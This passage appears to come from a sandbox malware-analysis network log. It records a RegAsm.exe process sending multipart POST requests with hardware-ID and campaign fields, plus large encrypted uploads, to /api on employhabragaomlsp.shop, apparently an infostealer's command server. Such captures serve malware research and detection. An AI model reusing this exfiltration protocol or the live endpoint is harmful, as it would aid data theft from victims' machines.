2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: 89 9c 31 78 f5 3f bc 64 6a 4e 31 5a 44 e0 87 b9 3f 4a 53 bb 4d 06 fe ea 21 e0 f7 29 35 10 88 2d fd f2 cc bb 33 ef ba 9a 7a 99 7d ea cc 60 e6 35 ea 1d a1 0a e0 ef 87 ee 3e 4d 35 ff 4a 04 bf cb 7d 97 1e 3d a6 ce be 95 d3 de bf 8b 08 9a 0d c1 da 3d 19 78 12 67 8f 27 cd f9 6c 68 c9 c1 16 8b 9b e6 e9 b6 1e 5c 9d bd d9 d7 a8 91 15 a4 c6 d6 33 11 1f 27 2f 6f 68 9d a3 47 c3 b2 58 1c db 62 43 8b 44 3d c1 6a b9 ce 69 69 cf bc 4a 4e d9 90 ba 0e 1d 4c 88 72 f7 7d ba 6d ce 23 99 18 55 b5 cd c1 c0 cd 67 b8 5a 23 d9 af c9 23 b9 f2 8c 24 ec e9 a4 3d 52 26 bb eb f4 13 24 b4 43 f3 83 00 13 36 f2 28 9e 11 80 ba 22 83 cf a0 0a 10 2e 39 d1 67 a6 c9 e1 6f 74 ed 9c e0 79 5d 84 9f 0b d8 41 2f 25 61 bf 5c 09 13 a4 1c 1a 52 50 4e 2b e5 fa 1d be 27 75 62 dc c3 03 94 fe 23 f2 6f c6 Data Ascii: 1x?djN1ZD?JSM!)5-3z}`5>M5J}==xg'lh\3'/ohGXbCD=jiiJNLr}m#UgZ##$=R&$C6(".9goty]A/%a\RPN+'ub#o
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: 9d 7c 87 1c 6e e2 aa 43 7b 08 2e 0a 91 99 fd 97 81 4d a5 d3 39 bd 7c e6 bb 0d f7 20 fc 3e 97 71 18 3d 0b 8d ea 7f 29 d7 07 82 f1 38 20 0f 3c c0 be a6 cd 17 6a 4f 92 ac 0a 4d 79 6d 4a f6 6d 00 c8 c1 fd ef 03 ce 83 1c de 39 63 27 41 b2 ef c3 54 b4 f6 58 60 9f df 0d 8f e1 12 a8 42 2f bf 5e 0d 22 97 ce fd 5a ef cb 8b 4d 4a b6 c5 05 a0 fb db 5c d6 c7 70 59 71 1b 6d a2 eb 99 bc f9 85 ba 8b ba 77 25 98 32 c0 61 c5 f0 9f 00 4e 14 c3 db ac 19 c9 38 73 62 ec 09 cf 70 c9 a2 e5 80 0e 5c 95 65 b3 bc e8 ab 8f 79 ce 79 c0 ee 8e ec 2d be 9d 10 41 69 18 62 fd 3b 87 5b 6d b8 e4 3a 0b 81 06 16 cc 0c 47 3a 65 de be 1b ed 26 3e 5f b4 bb bc ad 2d a5 7c 2f 77 7d 63 8e d7 ad 56 c5 09 a1 d8 7e 2f d2 67 c8 38 46 b1 ee 65 6b 40 20 6a 99 d5 e3 25 9c 26 16 3a f1 f8 f7 5f bf 12 b5 66 Data Ascii: \|nC{.M9\| >q=)8 <jOMymJm9c'ATX`B/^"ZMJ\pYqmw%2aN8sbp\eyy-Aib;[m:G:e&>_-\|/w}cV~/g8Fek@ j%&:_f
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: db a3 b8 7a 91 89 c8 84 00 e5 45 f9 cd e1 7a 6e a2 0e 83 58 c1 66 4a a2 98 2d ab d5 bd 95 bc 71 91 77 0b 6e f1 71 e6 70 e2 ec 00 76 16 52 45 c8 a8 1e b9 19 ba 8f ac 42 72 6b b7 f5 14 2b 7c fc f7 df f4 3a 74 fe 57 97 23 54 69 ec fe d9 57 f3 5a 68 f0 7e da 9c 0f 90 b3 0d b8 a7 29 28 c4 da b3 df e0 ca b6 0c 1f 7a 20 fa bc ad e7 1c 5b 47 ca 5b 0f 24 dc a7 a5 f9 71 45 03 c0 e6 1e 06 73 ad 3e 92 c8 20 32 4c 34 d7 19 12 be 24 05 d1 4b 81 5d 86 a8 90 0a 63 04 31 1e 16 42 94 64 f9 ae dc 72 3d 42 0b 9b 2d 0a a9 d1 6c 5d 53 c3 be 2b 01 dd ab 5e 59 d1 0e 48 f0 34 20 ed 8d 5b 8d 4d a7 bf b2 87 c0 a7 3d a6 ae db 24 49 d9 75 26 e8 d8 9f 2b 79 9a 75 ca 02 37 7a 53 db 6d 9c a3 57 9b d7 61 4f 91 c6 69 86 3c 38 e9 b9 ba 7d 7c e4 7d 0c 69 8a 9b 14 61 7e 1f e3 44 2d 95 70 70 Data Ascii: zEznXfJ-qwnqpvREBrk+\|:tW#TiWZh~)(z [G[$qEs> 2L4$K]c1Bdr=B-l]S+^YH4 [M=$Iu&+yu7zSmWaOi<8}\|}ia~D-pp
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: de 2f 4c 15 be ee d5 1c c3 bb 41 e0 9e b6 91 9e 46 82 6f ce a7 59 69 7c e5 45 6d fc 5e 25 e3 cf 1d d5 68 19 28 e9 b3 93 07 6c 7e 47 4e 3e 12 13 19 bc f9 d7 3c 7f 78 cf c3 fa 84 88 75 21 2b a4 5b 7d ab e3 6c 36 cc 96 64 09 a3 80 fc af d1 fc 1b d6 ce 2c 83 a3 57 58 22 e0 e9 0e e7 5f c9 17 8f e4 38 0b 33 32 6d e9 66 c6 9b 78 b6 38 ca aa ca 95 5f d7 29 d5 42 7a 79 4b db c8 9e a2 da 13 8a 0f 05 1b 4f 90 1e 6a 93 ca 35 aa 10 e4 ad f8 da fd d1 53 5d 9b 11 ba ba e0 93 e8 b1 c7 ff 7d 4c 96 8c 25 f2 94 15 13 35 c5 1b 14 e9 0d 65 2b 45 cb df b1 32 73 9e 15 d5 17 7e 78 87 d7 cf 64 2e b0 37 b8 f6 31 9f 0c 46 c3 e6 5a ca c3 89 5e 7f 33 37 46 4b d8 c1 81 a3 be 73 94 01 8b 3f 6b 9b 5c a7 7c 8b 5d 26 1d 14 56 36 16 9f 20 c6 5c 23 e0 62 0e 25 bc 1e 37 3f fe 3e b1 80 f3 8b Data Ascii: /LAFoYi\|Em^%h(l~GN><xu!+[}l6d,WX"_832mfx8_)BzyKOj5S]}L%5e+E2s~xd.71FZ^37FKs?k\\|]&V6 \#b%7?>
2024-05-23 22:22:20 UTC	816	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k06tueifeatdgvh7ccvfiakqpq; expires=Mon, 16-Sep-2024 16:08:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TdTTCDmLXpqI3IS8NpWWWeX4bZbXIj%2Bdq3wO8bVWsNYeqWCLdctXzF0hCNQDDwwA9ZSdHIM%2Bj4CGuYCER36RvrWJ32lhhVVwhmiNinY%2B%2BDMP6ubzRD9jZzPVzxY%2FgXUGUTwPCOWDPhWENg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871986d510c9e-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49742	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:16 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: employhabragaomlsp.shop
2024-05-23 22:22:16 UTC	12854	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:17 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ds0nkea9rpn8db901rfhctfj11; expires=Mon, 16-Sep-2024 16:08:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZ0fq2BaojGDUS05P9c%2BrTCL8BSBKcdRKv%2FwfTko3TOJbN7faaag7dZOjUTKhRsLNZJnEMf4rPIj2e9mWoCsl5LcL3aGacrbIuPVF5q5zbLSnK15ArVVGXdTZLgEmRkhuPfJgv%2BoK1SKrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8888719aec0d4264-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49743	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:17 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 566526 Host: employhabragaomlsp.shop
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: 3b 5a 91 6a 2b dc 17 ab c1 e5 98 6b a8 77 2e 3f ba e3 3b fd a7 a4 cb 6b 05 8d 48 1f d8 d3 03 51 bf 6d 9c 8e 55 1e cc 4e 48 50 d9 5b cf 5a d4 0b 3b 1d f9 70 f6 50 9b 26 84 9e f7 79 a7 02 95 37 79 c5 42 2e 28 d1 45 6a 09 82 ca 66 73 95 0a 00 5f 71 b3 c9 7a f1 d1 e1 49 75 1e 66 96 b9 f4 4b 15 7f 28 bd 6c 6f 78 d6 73 d1 54 22 53 10 41 dd 70 11 fe f5 32 cc 11 2c 57 df 3c 37 fc b3 83 95 f1 8a 3e bb ca 0b 76 93 00 d5 33 12 2c f3 2d 66 61 2d 70 5b d6 f3 a9 ab e9 f1 37 65 64 ee f5 a6 b5 b3 d6 10 82 55 d7 eb 07 5f ae d8 23 a8 ca 16 ff df c3 98 bd 58 18 19 8c 21 6b b3 a7 01 c4 bd 6a 36 1f 76 05 96 88 36 b9 79 15 33 3c 1d c7 aa 30 57 97 a5 da cf 0c e5 dd c2 e7 33 b4 f3 a6 ba 2d 40 3e 0e d3 8b 84 7b 7f 3b f5 cd 42 d4 d7 63 01 aa 99 b2 d1 fb 32 6c cb 30 92 6d a1 a4 7d Data Ascii: ;Zj+kw.?;kHQmUNHP[Z;pP&y7yB.(Ejfs_qzIufK(loxsT"SAp2,W<7>v3,-fa-p[7edU_#X!kj6v6y3<0W3-@>{;Bc2l0m}
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: f7 96 71 73 9a 16 d2 33 be 33 fe 53 cd 2c 28 e2 a9 63 f3 03 c0 3d f7 93 d5 f5 93 d7 40 1f 0d ff 79 cc 5b 79 4c 34 3d 46 73 c7 f5 57 5f bd 2e fa 51 af b2 b3 13 c6 4a 5d 66 88 e2 78 46 fa f1 da c9 63 92 48 38 88 6f ec ca e5 63 ff 3c 0b 7d 9b 9e eb dc 64 7f 11 65 29 15 02 ee 53 ee 2f 3f 96 ce 72 7a a4 87 e3 13 53 3c c4 dd 2d 06 97 d0 0c 43 09 50 b2 db 64 4f e0 19 3c 3e e1 c2 d2 d0 3f f1 a2 a7 8a 22 f7 17 24 79 c0 70 a5 ee 8b f2 15 c1 1f 03 fd b9 f5 fa 43 3f ac 05 e9 c5 91 d2 c2 c2 b3 95 ae a1 26 bc a2 ef d1 84 a7 4d 70 43 f1 58 33 4e 69 dc 1e 04 7e d0 e0 4b 78 47 88 08 7b 61 a8 a4 c0 30 eb 8c f2 a2 ea b6 54 b0 72 8e ff f9 b4 8b b8 36 d4 63 7d 62 f6 de bd 3d 2d bf 79 a4 d7 30 0f df 5e bb ee ee 72 c3 e2 eb 28 e9 7b b5 db 0b 4b c3 85 fb 0e 05 88 6a 64 de 04 b8 Data Ascii: qs33S,(c=@y[yL4=FsW_.QJ]fxFcH8oc<}de)S/?rzS<-CPdO<>?"$ypC?&MpCX3Ni~KxG{a0Tr6c}b=-y0^r({Kjd
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: 6c ee 64 59 7f 90 8b 66 67 e2 e7 09 61 ae 5b 95 fd c5 c5 23 5b ae 29 e2 29 e2 af d4 66 9f 14 33 cb 95 ff dd 88 f4 e3 ca 73 72 68 0c eb 5f 1d b2 df 0c 3a c6 5b a8 b7 3c 50 a8 99 c3 58 fb fa dd 2a f6 10 9d 87 9a 8b 3e e5 e0 b8 ea 14 7e 68 63 c0 fd be e2 3d cd 45 27 f9 e4 a8 4f 1a 2f 5b 7e 62 6f de da 74 52 ea f9 d4 fb c6 48 9d 1e dc 97 01 c8 75 f0 5a 29 6a 72 eb e5 c6 bb 31 2d 34 cb 60 b6 93 33 70 4b 67 5d 40 22 2e ef 47 06 b7 2e fa 93 a2 f1 23 b8 be dd df 41 14 d4 fc 0c ee 3b fd 57 1d 87 3f c3 92 de 9b 2d 52 28 71 89 1d be d6 ae 69 af 01 8c 60 93 c3 c2 71 4f c2 0f 94 2d de a2 df e0 03 d0 9c c4 01 6b 62 2a 67 8f 32 e9 e4 dc a2 ea a6 41 35 83 79 61 44 26 e6 45 52 68 d4 a8 10 45 e8 44 6d cb 8a 81 fc 83 47 31 8d c1 35 c5 59 7f e9 ed c7 fc c5 77 b4 63 cf 44 e8 Data Ascii: ldYfga[#[))f3srh_:[<PX>~hc=E'O/[~botRHuZ)jr1-4`3pKg]@".G.#A;W?-R(qi`qO-kbg2A5yaD&ERhEDmG15YwcD
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: 1d bf 0c ce 0a 16 9e 3c 4f b7 12 ba 25 95 53 a3 1f a3 15 93 58 45 bf 70 72 1a fc f0 87 de 9a 62 95 42 62 11 7f c1 c1 e5 ff 1a fd 10 50 78 97 bf 30 0f 73 01 03 b6 d0 c0 c0 07 9a 37 47 c8 32 a7 18 21 d2 ad aa cf 20 a9 1e af 97 be 55 87 90 79 d0 70 04 45 3f 3a f7 83 7e 36 85 d1 10 de 27 8a 1f 79 eb 6b ac cf f1 56 eb aa e0 e0 57 74 0d 6c 5f 7c ee 98 93 bc 2a 2e 88 90 79 fc d0 c4 39 d8 03 df 28 31 94 9c 2b 84 70 59 13 a7 b1 2c 60 9b 21 bd 74 66 28 bb 18 f0 02 69 c6 2b 31 1e 11 f0 1e 7f f4 45 f5 f6 4a ba 03 d5 44 c6 e4 24 7f 39 78 96 5d 70 19 0d f3 09 a8 83 97 b9 36 13 d0 29 3e ec da 93 1f 55 a9 a3 c8 1c 6c 5e 2c fe e9 86 a8 3d e3 58 6a 8a 38 de 5f 3b b3 82 b3 0f 1b 59 22 ef 00 65 fa 80 12 2f d1 37 6d 42 f7 49 35 c6 c0 90 4e eb f6 cc fb d1 c4 55 de f7 b2 d6 a6 Data Ascii: <O%SXEprbBbPx0s7G2! UypE?:~6'ykVWtl_\|*.y9(1+pY,`!tf(i+1EJD$9x]p6)>Ul^,=Xj8_;Y"e/7mBI5NU
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: bc 6a d0 da 3f 60 7b 8e 5e 6a 33 9e b9 31 29 79 41 5c df 77 c5 d5 eb 20 d5 6b 56 49 2e 22 50 e8 30 a9 d9 31 8c 3c 92 5d 68 33 32 af b8 5f b4 ba ca f2 6b a7 b1 ff 45 ed 49 a3 45 77 af 9e 06 a3 57 98 68 d0 5c c4 99 fc 75 b0 ce f5 a6 24 4b 44 b8 f2 4c 92 bb 5a 0c e9 c6 a8 20 a5 06 3e c3 7a 10 71 53 6c 03 cb 6e fd 45 4f c6 8e 47 a4 17 80 31 83 4d 7d b9 66 3d de f7 72 cb b8 c0 d3 a4 9e a8 10 cb 73 b7 1c 77 dd 28 60 d9 ba 65 98 57 19 ef 52 3a 47 93 5c 88 a1 a6 32 97 4f c6 59 59 29 65 28 f7 c5 66 88 89 c5 cb 7c 59 fd 59 9f c3 e4 e5 ff 41 3a 4f bb 39 8b b9 2f 3b a9 b7 b9 ef 1c 6b 2b 43 e8 93 9c d6 12 78 12 d7 66 00 9f 65 bb a9 32 4a 25 9f 29 24 a9 0b f0 d5 84 fd 62 35 fc 23 52 65 e2 84 ab ca ef 26 78 0b 1c f2 e6 74 9a 3a 25 4a 3d 5b 95 42 d1 ff 65 ce b5 06 16 73 Data Ascii: j?`{^j31)yA\w kVI."P01<]h32_kEIEwWh\u$KDLZ >zqSlnEOG1M}f=rsw(`eWR:G\2OYY)e(f\|YYA:O9/;k+Cxfe2J%)$b5#Re&xt:%J=[Bes
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: 89 9c 31 78 f5 3f bc 64 6a 4e 31 5a 44 e0 87 b9 3f 4a 53 bb 4d 06 fe ea 21 e0 f7 29 35 10 88 2d fd f2 cc bb 33 ef ba 9a 7a 99 7d ea cc 60 e6 35 ea 1d a1 0a e0 ef 87 ee 3e 4d 35 ff 4a 04 bf cb 7d 97 1e 3d a6 ce be 95 d3 de bf 8b 08 9a 0d c1 da 3d 19 78 12 67 8f 27 cd f9 6c 68 c9 c1 16 8b 9b e6 e9 b6 1e 5c 9d bd d9 d7 a8 91 15 a4 c6 d6 33 11 1f 27 2f 6f 68 9d a3 47 c3 b2 58 1c db 62 43 8b 44 3d c1 6a b9 ce 69 69 cf bc 4a 4e d9 90 ba 0e 1d 4c 88 72 f7 7d ba 6d ce 23 99 18 55 b5 cd c1 c0 cd 67 b8 5a 23 d9 af c9 23 b9 f2 8c 24 ec e9 a4 3d 52 26 bb eb f4 13 24 b4 43 f3 83 00 13 36 f2 28 9e 11 80 ba 22 83 cf a0 0a 10 2e 39 d1 67 a6 c9 e1 6f 74 ed 9c e0 79 5d 84 9f 0b d8 41 2f 25 61 bf 5c 09 13 a4 1c 1a 52 50 4e 2b e5 fa 1d be 27 75 62 dc c3 03 94 fe 23 f2 6f c6 Data Ascii: 1x?djN1ZD?JSM!)5-3z}`5>M5J}==xg'lh\3'/ohGXbCD=jiiJNLr}m#UgZ##$=R&$C6(".9goty]A/%a\RPN+'ub#o
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: 9d 7c 87 1c 6e e2 aa 43 7b 08 2e 0a 91 99 fd 97 81 4d a5 d3 39 bd 7c e6 bb 0d f7 20 fc 3e 97 71 18 3d 0b 8d ea 7f 29 d7 07 82 f1 38 20 0f 3c c0 be a6 cd 17 6a 4f 92 ac 0a 4d 79 6d 4a f6 6d 00 c8 c1 fd ef 03 ce 83 1c de 39 63 27 41 b2 ef c3 54 b4 f6 58 60 9f df 0d 8f e1 12 a8 42 2f bf 5e 0d 22 97 ce fd 5a ef cb 8b 4d 4a b6 c5 05 a0 fb db 5c d6 c7 70 59 71 1b 6d a2 eb 99 bc f9 85 ba 8b ba 77 25 98 32 c0 61 c5 f0 9f 00 4e 14 c3 db ac 19 c9 38 73 62 ec 09 cf 70 c9 a2 e5 80 0e 5c 95 65 b3 bc e8 ab 8f 79 ce 79 c0 ee 8e ec 2d be 9d 10 41 69 18 62 fd 3b 87 5b 6d b8 e4 3a 0b 81 06 16 cc 0c 47 3a 65 de be 1b ed 26 3e 5f b4 bb bc ad 2d a5 7c 2f 77 7d 63 8e d7 ad 56 c5 09 a1 d8 7e 2f d2 67 c8 38 46 b1 ee 65 6b 40 20 6a 99 d5 e3 25 9c 26 16 3a f1 f8 f7 5f bf 12 b5 66 Data Ascii: \|nC{.M9\| >q=)8 <jOMymJm9c'ATX`B/^"ZMJ\pYqmw%2aN8sbp\eyy-Aib;[m:G:e&>_-\|/w}cV~/g8Fek@ j%&:_f
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: db a3 b8 7a 91 89 c8 84 00 e5 45 f9 cd e1 7a 6e a2 0e 83 58 c1 66 4a a2 98 2d ab d5 bd 95 bc 71 91 77 0b 6e f1 71 e6 70 e2 ec 00 76 16 52 45 c8 a8 1e b9 19 ba 8f ac 42 72 6b b7 f5 14 2b 7c fc f7 df f4 3a 74 fe 57 97 23 54 69 ec fe d9 57 f3 5a 68 f0 7e da 9c 0f 90 b3 0d b8 a7 29 28 c4 da b3 df e0 ca b6 0c 1f 7a 20 fa bc ad e7 1c 5b 47 ca 5b 0f 24 dc a7 a5 f9 71 45 03 c0 e6 1e 06 73 ad 3e 92 c8 20 32 4c 34 d7 19 12 be 24 05 d1 4b 81 5d 86 a8 90 0a 63 04 31 1e 16 42 94 64 f9 ae dc 72 3d 42 0b 9b 2d 0a a9 d1 6c 5d 53 c3 be 2b 01 dd ab 5e 59 d1 0e 48 f0 34 20 ed 8d 5b 8d 4d a7 bf b2 87 c0 a7 3d a6 ae db 24 49 d9 75 26 e8 d8 9f 2b 79 9a 75 ca 02 37 7a 53 db 6d 9c a3 57 9b d7 61 4f 91 c6 69 86 3c 38 e9 b9 ba 7d 7c e4 7d 0c 69 8a 9b 14 61 7e 1f e3 44 2d 95 70 70 Data Ascii: zEznXfJ-qwnqpvREBrk+\|:tW#TiWZh~)(z [G[$qEs> 2L4$K]c1Bdr=B-l]S+^YH4 [M=$Iu&+yu7zSmWaOi<8}\|}ia~D-pp
2024-05-23 22:22:17 UTC	15331	OUT	Data Raw: de 2f 4c 15 be ee d5 1c c3 bb 41 e0 9e b6 91 9e 46 82 6f ce a7 59 69 7c e5 45 6d fc 5e 25 e3 cf 1d d5 68 19 28 e9 b3 93 07 6c 7e 47 4e 3e 12 13 19 bc f9 d7 3c 7f 78 cf c3 fa 84 88 75 21 2b a4 5b 7d ab e3 6c 36 cc 96 64 09 a3 80 fc af d1 fc 1b d6 ce 2c 83 a3 57 58 22 e0 e9 0e e7 5f c9 17 8f e4 38 0b 33 32 6d e9 66 c6 9b 78 b6 38 ca aa ca 95 5f d7 29 d5 42 7a 79 4b db c8 9e a2 da 13 8a 0f 05 1b 4f 90 1e 6a 93 ca 35 aa 10 e4 ad f8 da fd d1 53 5d 9b 11 ba ba e0 93 e8 b1 c7 ff 7d 4c 96 8c 25 f2 94 15 13 35 c5 1b 14 e9 0d 65 2b 45 cb df b1 32 73 9e 15 d5 17 7e 78 87 d7 cf 64 2e b0 37 b8 f6 31 9f 0c 46 c3 e6 5a ca c3 89 5e 7f 33 37 46 4b d8 c1 81 a3 be 73 94 01 8b 3f 6b 9b 5c a7 7c 8b 5d 26 1d 14 56 36 16 9f 20 c6 5c 23 e0 62 0e 25 bc 1e 37 3f fe 3e b1 80 f3 8b Data Ascii: /LAFoYi\|Em^%h(l~GN><xu!+[}l6d,WX"_832mfx8_)BzyKOj5S]}L%5e+E2s~xd.71FZ^37FKs?k\\|]&V6 \#b%7?>
2024-05-23 22:22:20 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=amgt4lmdgd723jgjl31fdkjoq7; expires=Mon, 16-Sep-2024 16:08:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fnBuPAmEQ5ujBPo0DDqOTFWX6FrNvTg3enQep2GrMp7LL0oF1LNizX2udK72DD42rr70otacxArTbQkosF9Bz6hLE5cNFrRqHjnOjHH%2BzWiQTeUsOUyyJ4BLYNgD%2Ba8dRuZjdG5mgtnsGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871a13e1917f1-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49744	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:18 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15100 Host: employhabragaomlsp.shop
2024-05-23 22:22:18 UTC	15100	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
